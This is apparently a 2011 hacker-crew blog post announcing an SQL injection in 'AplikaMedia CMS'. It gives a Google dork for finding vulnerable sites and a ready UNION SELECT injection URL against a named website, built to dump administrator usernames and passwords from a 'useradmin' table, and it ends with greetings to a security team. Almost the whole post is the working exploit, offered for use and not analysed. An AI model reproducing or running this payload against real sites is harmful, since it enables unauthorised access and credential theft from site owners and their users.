‌‌‌‌ ‌‌‌‌ ‌‌‌‌: AplikaMedia CMS SQL Injection

Rabu, 16 Maret 2011

AplikaMedia CMS SQL Injection

[~] Google Dork : inurl:page_info.php?id_brt=

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                   [Exploit]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]Exploit:

http://www.dyna-h2o.com/page_info.php?id_brt=[Sql_injection]
 
[+]Example:

http://www.dyna-h2o.com/page_info.php?id_brt=43%20and%201=2%20union%

20select%200,1,2,3,4,0x483358205761732048657265202520536570656872205365

637572697479205465616d,6,group_concat%28username,0x3a,password%29,8,9,10,11,

12,13,14,15%20from%20useradmin--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[*]Greetz:thE_Knight - Einestin - Wizard - Naboodgar 
   C0NS74NTINE & all Sepehr Security Teams members

blogger templates